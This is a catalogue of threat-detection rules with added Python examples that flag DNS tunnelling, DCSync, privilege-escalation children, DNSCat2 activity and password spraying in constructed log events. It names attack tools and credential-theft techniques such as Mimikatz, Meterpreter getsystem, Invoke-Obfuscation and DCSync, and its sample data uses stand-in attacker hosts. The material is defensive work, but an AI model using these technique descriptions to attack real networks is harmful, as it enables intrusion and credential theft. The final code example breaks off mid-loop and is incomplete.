CVE-2021-3156 Exploitation Attempt Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing required to trigger the heap-based buffer overflow. https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
CVE-2021-3156 Exploitation Attempt Bruteforcing Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to the bruteforcing required to trigger the heap-based buffer overflow. https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
Potential CVE-2021-4034 Exploitation Attempt Detects exploitation attempt of the vulnerability described in CVE-2021-4034. https://github.com/berdav/CVE-2021-4034, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034, https://access.redhat.com/security/cve/CVE-2021-4034
Use of Debugfs to Access a Raw Disk Detects access to a raw disk on a host to evade detection by security products. https://twitter.com/0xm1rch/status/1600857731073654784?s=20&t=MdrBPqv4hnBEfAJBayMCZA, https://github.com/Neo23x0/auditd/blob/master/audit.rules
OMIGOD SCX RunAsProvider ExecuteScript Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed gets created as a temp file in the /tmp folder with a scx* prefix. Then it is invoked from the following directory: /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/, https://github.com/Azure/Azure-Sentinel/pull/3071/files
Failed Logins with Different Accounts from Single Source - Linux Detects suspicious failed logins with different user accounts from a single source system None
Privilege Escalation Preparation Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/, https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/, https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml
Possible DNS Tunneling Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data. https://zeltser.com/c2-dns-tunneling/, https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/
High DNS Bytes Out High volume of DNS query bytes sent from a host in a short period of time None
High NULL Records Requests Rate Extremely high rate of NULL record type DNS requests from a host in a short period of time. Possible result of iodine tool execution None
High DNS Requests Rate High number of DNS requests from a host in a short period of time None
High DNS subdomain requests rate per domain High rate of unique Fully Qualified Domain Name (FQDN) requests per root domain (eTLD+1) in a short period of time None
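The "Possible DNS Tunneling" and "High DNS subdomain requests rate per domain" rules above both reduce to one aggregation: distinct query names per root domain, per client, per time window. The Python below is an added example (not part of the Sigma rule set or SigmaTACT) that runs that aggregation over a constructed query log containing one tunnelling host and one ordinary host. It approximates the root domain as the last two labels, which is an assumption; a production hunt should derive eTLD+1 from the Public Suffix List so that names such as example.co.uk are not mis-grouped. The 60-second fixed window and the threshold of 30 are also assumptions to be tuned against a baseline.

```python
"""Rate-based DNS tunnelling hunt: count distinct FQDNs per root domain per
client inside fixed time windows.  Added example, not part of the Sigma rule
set; the query log is constructed.  Assumption: root domain = last two labels
(use the Public Suffix List for real eTLD+1 handling)."""
from collections import defaultdict


def root_domain(qname):
    """Approximate eTLD+1 as the last two labels of the name (assumption)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def unique_fqdn_rate(queries, window_seconds=60):
    """Map (client, root_domain) -> peak number of distinct FQDNs seen in any
    single fixed window.  queries: iterable of (epoch_seconds, client_ip, qname)."""
    buckets = defaultdict(set)  # (client, root, window index) -> {fqdn}
    for ts, client, qname in queries:
        key = (client, root_domain(qname), int(ts // window_seconds))
        buckets[key].add(qname.lower().rstrip("."))
    peak = defaultdict(int)
    for (client, root, _window), names in buckets.items():
        peak[(client, root)] = max(peak[(client, root)], len(names))
    return dict(peak)


def suspected_tunnels(queries, threshold=30, window_seconds=60):
    """Sorted (client, root_domain, peak_unique) tuples that reach the threshold."""
    rates = unique_fqdn_rate(queries, window_seconds)
    return sorted((c, r, n) for (c, r), n in rates.items() if n >= threshold)


def build_sample_log():
    """Constructed query log: 10.0.0.5 pushes 40 encoded labels under one root
    within 20 seconds, 10.0.0.7 makes a handful of ordinary lookups."""
    log = []
    base = 1_700_000_000.0
    for i in range(40):
        log.append((base + i * 0.5, "10.0.0.5", "%04xa1b2c3.t.tunnel.example" % i))
    ordinary = ["www.example.com", "cdn.example.com", "mail.example.com",
                "login.microsoftonline.com", "example.com"]
    for i, name in enumerate(ordinary):
        log.append((base + i, "10.0.0.7", name))
    return log


if __name__ == "__main__":
    for client, root, n in suspected_tunnels(build_sample_log()):
        print("%s -> %s: %d unique names in one window" % (client, root, n))
```

Distinct names, not raw query count, is the discriminating feature: a busy but normal host repeats the same few names, while a tunnel must encode fresh data into every label. Fixed windows are simpler than sliding ones and are enough to surface the burst; the trade-off is that a burst straddling a window boundary is split in two, which a lower threshold or an overlapping second pass compensates for.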
High TXT Records Requests Rate Extremely high rate of TXT record type DNS requests from a host in a short period of time. Possible result of Do-exfiltration tool execution None
Large domain name request Detects unusually large DNS domain names None
High DNS Bytes Out - Firewall High volume of DNS query bytes sent from a host in a short period of time None
High DNS Requests Rate - Firewall High number of DNS requests from a host in a short period of time None
Network Scans Count By Destination IP Detects many failed connection attempts to different ports or hosts None
Possible DNS Rebinding Detects DNS answers with a TTL below 10 seconds. https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
Network Scans Count By Destination Port Detects many failed connection attempts to different ports or hosts None
Multiple Modsecurity Blocks Detects multiple blocks by the mod_security module (Web Application Firewall) None
Multiple Suspicious Resp Codes Caused by Single Client Detects possible exploitation activity or bugs in a web application None
Invoke-Obfuscation CLIP+ Launcher Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block) https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Possible DNS Rebinding Detects several different DNS answers for one domain with IPs from both internal and external networks. Normally a DNS answer carries a TTL > 100 (the record stays in the host cache for the duration of the TTL); rebinding relies on very short TTLs so that the victim re-resolves the name and receives a different address. https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
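The DNS tunnelling, rate and rebinding rules above (High DNS Bytes Out, High NULL/TXT Records Requests Rate, High DNS Requests Rate, High DNS subdomain requests rate per domain, Large domain name request, Possible DNS Rebinding) all reduce to per-host aggregation over one short window. The following is an added example written for this report, not a Sigma rule and not SigmaHQ code: it runs those heuristics over constructed resolver records. The record layout, the thresholds and the two-label eTLD+1 approximation are assumptions chosen for illustration.

```python
import ipaddress
from collections import defaultdict

# Thresholds are assumptions for this example; tune them per environment and window size.
MAX_REQUESTS = 30        # High DNS Requests Rate
MAX_BYTES_OUT = 4000     # High DNS Bytes Out
MAX_NULL_TXT = 20        # High NULL / TXT Records Requests Rate
MAX_UNIQUE_FQDN = 30     # High DNS subdomain requests rate per domain
MAX_NAME_LEN = 100       # Large domain name request
REBIND_TTL = 10          # Possible DNS Rebinding (TTL < 10)

# "Internal" means RFC 1918 here; the rebinding rule compares internal vs external answers.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def root_domain(qname):
    """eTLD+1 approximation: the last two labels. Production code should use the
    Public Suffix List so that e.g. 'foo.co.uk' is not collapsed to 'co.uk'."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def analyse_window(records):
    """Apply the rate and rebinding heuristics to the records of one short window.
    Each record: client, qname, qtype, bytes_out; answered queries also carry ttl and answer."""
    requests = defaultdict(int)
    bytes_out = defaultdict(int)
    null_txt = defaultdict(int)
    fqdns = defaultdict(set)      # (client, eTLD+1) -> distinct names queried
    answers = defaultdict(set)    # qname -> distinct answer IPs
    alerts = []
    for r in records:
        c = r["client"]
        requests[c] += 1
        bytes_out[c] += r["bytes_out"]
        if r["qtype"] in ("NULL", "TXT"):
            null_txt[c] += 1
        fqdns[(c, root_domain(r["qname"]))].add(r["qname"])
        if len(r["qname"]) > MAX_NAME_LEN:
            alerts.append(("large_domain_name", c, r["qname"]))
        if r.get("answer"):
            answers[r["qname"]].add(r["answer"])
            if r["ttl"] < REBIND_TTL:
                alerts.append(("rebinding_low_ttl", c, r["qname"]))
    for c, n in requests.items():
        if n > MAX_REQUESTS:
            alerts.append(("high_request_rate", c, n))
    for c, n in bytes_out.items():
        if n > MAX_BYTES_OUT:
            alerts.append(("high_bytes_out", c, n))
    for c, n in null_txt.items():
        if n > MAX_NULL_TXT:
            alerts.append(("high_null_txt_rate", c, n))
    for (c, root), names in fqdns.items():
        if len(names) > MAX_UNIQUE_FQDN:
            alerts.append(("high_subdomain_rate", c, root, len(names)))
    for qname, ips in answers.items():
        if any(is_internal(i) for i in ips) and any(not is_internal(i) for i in ips):
            alerts.append(("rebinding_mixed_answers", qname, sorted(ips)))
    return alerts


def constructed_dns_records():
    """Constructed sample (not real traffic): one tunnelling host sending iodine-style
    NULL queries with encoded data in the subdomain, one normal host, one rebinding domain."""
    recs = []
    for i in range(40):   # 40 distinct NULL queries under a single root domain
        recs.append({"client": "10.0.0.5", "qname": f"{i:032x}.t.evil.example",
                     "qtype": "NULL", "bytes_out": 120, "ttl": 60, "answer": "203.0.113.9"})
    recs.append({"client": "10.0.0.5", "qname": "x" * 60 + "." + "y" * 60 + ".t.evil.example",
                 "qtype": "NULL", "bytes_out": 160, "ttl": 60, "answer": "203.0.113.9"})
    recs.append({"client": "10.0.0.7", "qname": "www.example.org", "qtype": "A",
                 "bytes_out": 33, "ttl": 300, "answer": "93.184.216.34"})
    # Rebinding: the same name resolves first to an external, then to an internal IP, each with TTL 5.
    recs.append({"client": "10.0.0.7", "qname": "rb.attacker.example", "qtype": "A",
                 "bytes_out": 37, "ttl": 5, "answer": "198.51.100.4"})
    recs.append({"client": "10.0.0.7", "qname": "rb.attacker.example", "qtype": "A",
                 "bytes_out": 37, "ttl": 5, "answer": "192.168.1.10"})
    return recs


def alert_kinds(records=None):
    """Set of distinct alert names raised for a window (defaults to the constructed sample)."""
    return {a[0] for a in analyse_window(records if records is not None else constructed_dns_records())}


if __name__ == "__main__":
    for alert in analyse_window(constructed_dns_records()):
        print(alert)
```

The caller is expected to slice its log into windows (for example one minute) and call `analyse_window` on each slice; the NULL/TXT and unique-FQDN counts are the ones that separate iodine- and dnscat-style tunnels from a busy but legitimate resolver client.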
Invoke-Obfuscation VAR+ Launcher Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip Detects obfuscated PowerShell that uses Clip.exe in scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA Detects obfuscated PowerShell that uses MSHTA in scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 Detects obfuscated PowerShell that uses Rundll32 in scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Meterpreter or Cobalt Strike Getsystem Service Installation Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
Tap Driver Installation Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques None
File Creation by Office Applications This rule monitors executable and script file creation by Office applications. Add further file extensions or magic bytes to the logic as needed. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Mimikatz In-Memory Detects certain DLL loads when Mimikatz gets executed https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/
Execution via CL_Invocation.ps1 (2 Lines) Detects Execution via SyncInvoke in CL_Invocation.ps1 module https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424
Execution via CL_Mutexverifiers.ps1 (2 Lines) Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/, https://twitter.com/pabraeken/status/995111125447577600
Silence.Downloader V3 Detects Silence downloader. These commands are hardcoded into the binary. None
Automated Turla Group Lateral Movement Detects automated lateral movement by Turla group https://securelist.com/the-epic-turla-operation/65545/
DNSCat2 Powershell Implementation Detection Via Process Creation The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally. https://github.com/lukebaggett/dnscat2-powershell, https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html, https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html
Reconnaissance Activity Using BuiltIn Commands Detects execution of a set of built-in commands often used in the recon stage by different attack groups https://twitter.com/haroonmeer/status/939099379834658817, https://twitter.com/c_APT_ure/status/939475433711722497, https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
Quick Execution of a Series of Suspicious Commands Detects multiple suspicious processes in a limited timeframe https://car.mitre.org/wiki/CAR-2013-04-002
MSI Spawned Cmd and Powershell Spawned Processes This rule looks for the Windows Installer service (msiexec.exe) spawning cmd.exe and/or PowerShell that in turn spawn other processes https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg, https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
Always Install Elevated Parent Child Correlated This rule looks for any low-privileged process launching the Windows Installer service (msiexec.exe) to install MSI packages with SYSTEM privileges https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg
Files Dropped to Program Files by Non-Priviledged Process Searches for files dropped into the Windows or Program Files folders by non-privileged processes https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-37-638.jpg
Stored Credentials in Fake Files Detects access to decoy files that appear to contain stored credentials https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-13-638.jpg
Dumping ntds.dit remotely via DCSync Retrieval of ntds.dit contents by synchronising with a legitimate domain controller over the Directory Replication Service Remote Protocol (MS-DRSR) https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Dumping ntds.dit remotely via NetSync Retrieval of ntds.dit contents (computer accounts only) by synchronising with a legitimate domain controller over the Netlogon Remote Protocol https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
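DCSync abuses the replication rights a domain controller normally uses; on a DC with "Audit Directory Service Access" enabled, a replication request shows up as Event ID 4662 with AccessMask 0x100 (control access) and the replication extended-right GUIDs in the Properties field. The following is an added example written for this report, not the Sigma rule's logic and not SigmaHQ code: it filters constructed 4662 events for those GUIDs and ignores accounts that legitimately replicate. The list of DC computer accounts and the `MSOL_` allowlist prefix are assumptions you would replace with your own inventory.

```python
import re

# Schema GUIDs of the extended rights DRSUAPI replication needs (public Active Directory schema values).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}")
CONTROL_ACCESS = 0x100   # ADS_RIGHT_DS_CONTROL_ACCESS: extended rights such as replication


def replication_rights(properties):
    """Names of the replication rights referenced in a 4662 Properties field."""
    return sorted(REPLICATION_GUIDS[g.lower()] for g in GUID_RE.findall(properties)
                  if g.lower() in REPLICATION_GUIDS)


def dcsync_alerts(events, dc_accounts, allowed_prefixes=("MSOL_",)):
    """Flag 4662 control-access events exercising replication rights from accounts that
    are neither domain controllers nor allowlisted synchronisation services (assumed prefix MSOL_)."""
    dcs = {a.upper() for a in dc_accounts}
    prefixes = tuple(p.upper() for p in allowed_prefixes)
    alerts = []
    for ev in events:
        if ev["EventID"] != "4662" or int(ev["AccessMask"], 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights(ev["Properties"])
        if not rights:
            continue
        user = ev["SubjectUserName"]
        if user.upper() in dcs or user.upper().startswith(prefixes):
            continue
        alerts.append((ev["SubjectDomainName"] + "\\" + user, rights))
    return alerts


def constructed_4662_events():
    """Constructed events (not real logs). Properties lists the object type GUID first,
    then the rights that were exercised, as the real event does."""
    both = ("{19195a5b-6da0-11d0-afd3-00c04fd930c9}\n\t"
            "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
    base = {"EventID": "4662", "SubjectDomainName": "CORP"}
    return [
        dict(base, SubjectUserName="DC02$", AccessMask="0x100", Properties=both),        # partner DC
        dict(base, SubjectUserName="MSOL_4f2a1c", AccessMask="0x100", Properties=both),  # assumed AAD Connect account
        dict(base, SubjectUserName="alice", AccessMask="0x100", Properties=both),        # a user replicating: DCSync
        dict(base, SubjectUserName="alice", AccessMask="0x20",
             Properties="{19195a5b-6da0-11d0-afd3-00c04fd930c9}"),                       # ordinary write, ignore
    ]


if __name__ == "__main__":
    print(dcsync_alerts(constructed_4662_events(), ["DC01$", "DC02$"]))
```

In practice the allowlist should be derived from the accounts that actually hold these rights on the domain head (an ACL review), since a silently granted DS-Replication-Get-Changes-All is itself a persistence technique. NetSync (the second rule above) is not visible in 4662; it is caught on the Netlogon side instead.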
Windows Kernel and 3rd-Party Drivers Exploits Token Stealing Detection of child processes spawned with SYSTEM privileges by parents running with non-SYSTEM privileges at Medium integrity level https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
Malicious Service Installations Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. https://awakesecurity.com/blog/threat-hunting-for-paexec/, https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html, https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf
Metasploit Or Impacket Service Installation Via SMB PsExec Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation https://bczyz1.github.io/2021/01/30/psexec.html
Detection of Possible Rotten Potato Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
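The two parent/child privilege rules above (Token Stealing: SYSTEM child of a Medium-integrity non-SYSTEM parent; Rotten Potato: SYSTEM child of a LOCAL SERVICE or NETWORK SERVICE parent) and the DNSCat2 rule earlier in this list (hundreds of nslookup.exe children of one PowerShell process) all run over process-creation events. The following is an added example written for this report, not the Sigma rules themselves and not SigmaHQ code. It assumes events have already been joined with their parent's user and integrity level: Sysmon Event ID 1 carries User and IntegrityLevel, newer Sysmon versions add ParentUser, and ParentIntegrityLevel is not a native field and must be looked up from the parent's own event. Field names and the nslookup threshold are assumptions.

```python
from collections import Counter

SYSTEM = r"NT AUTHORITY\SYSTEM"
SERVICE_ACCOUNTS = {r"NT AUTHORITY\LOCAL SERVICE", r"NT AUTHORITY\NETWORK SERVICE"}
NSLOOKUP_THRESHOLD = 50   # assumption; the PowerShell DNSCat2 client spawns hundreds to thousands


def check_privilege_escalation(ev):
    """Return the matching rule title for one process-creation event, or None."""
    if ev["User"] != SYSTEM or ev["ParentUser"] == SYSTEM:
        return None           # only SYSTEM children of non-SYSTEM parents are interesting
    if ev["ParentUser"] in SERVICE_ACCOUNTS:
        return "Detection of Possible Rotten Potato"
    if ev["ParentIntegrityLevel"] == "Medium":
        return "Windows Kernel and 3rd-Party Drivers Exploits Token Stealing"
    return None


def check_dnscat2(events, threshold=NSLOOKUP_THRESHOLD):
    """Count nslookup.exe children per PowerShell parent PID within one window."""
    hits = Counter()
    for ev in events:
        image = ev["Image"].lower()
        parent = ev["ParentImage"].lower()
        if image.endswith("\\nslookup.exe") and parent.endswith(("\\powershell.exe", "\\pwsh.exe")):
            hits[ev["ParentProcessId"]] += 1
    return {pid: n for pid, n in hits.items() if n >= threshold}


def constructed_process_events():
    """Constructed events (not real logs): a DNSCat2-style nslookup storm, a Rotten Potato
    style child, a token-stealing style child, and a benign service start."""
    nslookup = dict(ParentProcessId=4000, ParentImage=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    Image=r"C:\Windows\System32\nslookup.exe", User=r"CORP\alice", ParentUser=r"CORP\alice",
                    IntegrityLevel="Medium", ParentIntegrityLevel="Medium")
    events = [dict(nslookup, ProcessId=5000 + i) for i in range(120)]
    events.append(dict(ProcessId=6000, ParentProcessId=812, ParentImage=r"C:\Windows\System32\svchost.exe",
                       Image=r"C:\Windows\System32\cmd.exe", User=SYSTEM,
                       ParentUser=r"NT AUTHORITY\NETWORK SERVICE",
                       IntegrityLevel="System", ParentIntegrityLevel="System"))
    events.append(dict(ProcessId=6001, ParentProcessId=2100, ParentImage=r"C:\Users\alice\Desktop\exploit.exe",
                       Image=r"C:\Windows\System32\cmd.exe", User=SYSTEM, ParentUser=r"CORP\alice",
                       IntegrityLevel="System", ParentIntegrityLevel="Medium"))
    events.append(dict(ProcessId=6002, ParentProcessId=700, ParentImage=r"C:\Windows\System32\services.exe",
                       Image=r"C:\Windows\System32\svchost.exe", User=SYSTEM, ParentUser=SYSTEM,
                       IntegrityLevel="System", ParentIntegrityLevel="System"))
    return events


def run_process_checks(events=None):
    events = events if events is not None else constructed_process_events()
    privesc = [(ev["ProcessId"], check_privilege_escalation(ev)) for ev in events
               if check_privilege_escalation(ev)]
    return {"privesc": privesc, "dnscat2": check_dnscat2(events)}


if __name__ == "__main__":
    print(run_process_checks())
```

Expect to add exclusions for software that legitimately creates SYSTEM processes from a user context (installers, EDR and management agents); the parent image path is the usual discriminator.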
Remote Schtasks Creation Detects remote execution via scheduled task creation or update on the destination host https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Enumeration via the Global Catalog Detects enumeration of the global catalog (which can be performed using BloodHound or other AD reconnaissance tools). Adjust the threshold according to domain size. https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156
Rare Schtasks Creations Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code None
Password Spraying via Explicit Credentials Detects a single user failing to authenticate as multiple target accounts using explicit credentials. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Multiple Users Failing to Authenticate from Single Process Detects failed logins with multiple accounts from a single process on the system. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying, https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing
Failed Logins with Different Accounts from Single Source System Detects suspicious failed logins with different user accounts from a single source system None
Failed NTLM Logins with Different Accounts from Single Source System Detects suspicious failed logins with different user accounts from a single source system None
Valid Users Failing to Authenticate From Single Source Using Kerberos Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Disabled Users Failing To Authenticate From Source Using Kerberos Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Invalid Users Failing To Authenticate From Source Using Kerberos Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Valid Users Failing to Authenticate from Single Source Using NTLM Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Invalid Users Failing To Authenticate From Single Source Using NTLM Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Multiple Users Remotely Failing To Authenticate From Single Source Detects a source system failing to authenticate against a remote host with multiple users. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
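The password-spraying rules above are variations on one aggregation: many distinct target accounts failing from a single key (source IP, subject user with explicit credentials, or process) within a window, split by protocol and by whether the target account is valid, invalid or disabled. The following is an added example written for this report, not the Sigma rules' logic and not SigmaHQ code: it classifies constructed Windows Security events by the documented Kerberos status codes (4771 0x18, 4768 0x6 and 0x12) and 4625 sub-status codes, then counts distinct targets per key. The field names follow the Security log; the threshold, host names and IPs are assumptions.

```python
from collections import defaultdict

THRESHOLD = 10   # distinct target accounts per key within one window (assumption)

# Kerberos: 4771 = pre-authentication failed, 4768 = TGT request. Status codes are Windows' own.
KERBEROS_CLASS = {("4771", "0x18"): "valid",      # KDC_ERR_PREAUTH_FAILED: account exists, wrong password
                  ("4768", "0x6"):  "invalid",    # KDC_ERR_C_PRINCIPAL_UNKNOWN: no such account
                  ("4768", "0x12"): "disabled"}   # KDC_ERR_CLIENT_REVOKED: disabled, expired or locked
# 4625 SubStatus values (NTLM or any other authentication package)
NTLM_CLASS = {"0xc000006a": "valid",      # wrong password
              "0xc0000064": "invalid",    # user name does not exist
              "0xc0000072": "disabled"}   # account disabled
NO_SOURCE = {"-", "", "127.0.0.1", "::1"}


def classify(ev):
    """Return (protocol, account_class) for a failed-authentication event, or None."""
    eid = ev["EventID"]
    if eid in ("4768", "4771"):
        cls = KERBEROS_CLASS.get((eid, ev["Status"].lower()))
        return ("kerberos", cls) if cls else None
    if eid == "4625":
        cls = NTLM_CLASS.get(ev["SubStatus"].lower())
        proto = "ntlm" if ev.get("AuthenticationPackageName") == "NTLM" else "other"
        return (proto, cls) if cls else None
    return None


def detect_spraying(events, threshold=THRESHOLD):
    by_source = defaultdict(set)    # (protocol, class, source IP) -> target accounts
    by_subject = defaultdict(set)   # (host, subject user)         -> targets (explicit credentials)
    by_process = defaultdict(set)   # (host, process)              -> targets
    for ev in events:
        c = classify(ev)
        if c is None:
            continue
        proto, cls = c
        target = ev["TargetUserName"].lower()
        if ev.get("IpAddress", "-") not in NO_SOURCE:
            by_source[(proto, cls, ev["IpAddress"])].add(target)
        if ev["EventID"] == "4625":
            subject = ev.get("SubjectUserName", "-")
            if subject not in ("-", "") and not subject.endswith("$"):   # a real user supplied the credentials
                by_subject[(ev["Computer"], subject)].add(target)
            if ev.get("ProcessName", "-") != "-":
                by_process[(ev["Computer"], ev["ProcessName"])].add(target)
    over = lambda d: sorted((k, len(v)) for k, v in d.items() if len(v) >= threshold)
    return {"by_source": over(by_source), "by_subject": over(by_subject), "by_process": over(by_process)}


def constructed_auth_events():
    """Constructed events (not real logs): an NTLM spray, a Kerberos spray against valid
    accounts, a Kerberos spray against unknown accounts, and an explicit-credential spray."""
    ev = []
    ntlm = {"EventID": "4625", "Computer": "DC01", "IpAddress": "10.20.30.40", "LogonType": "3",
            "AuthenticationPackageName": "NTLM", "SubjectUserName": "-", "ProcessName": "-"}
    for i in range(12):
        ev.append(dict(ntlm, SubStatus="0xC000006A", TargetUserName=f"user{i:02d}"))
    for i in range(3):   # a few guessed names that do not exist: below threshold
        ev.append(dict(ntlm, SubStatus="0xC0000064", TargetUserName=f"ghost{i}"))
    for i in range(11):
        ev.append({"EventID": "4771", "Computer": "DC01", "IpAddress": "10.20.30.41",
                   "Status": "0x18", "TargetUserName": f"user{i:02d}"})
    for i in range(12):
        ev.append({"EventID": "4768", "Computer": "DC01", "IpAddress": "10.20.30.42",
                   "Status": "0x6", "TargetUserName": f"nobody{i:02d}"})
    for i in range(11):   # bob on WS01 driving a spray with -Credential from PowerShell
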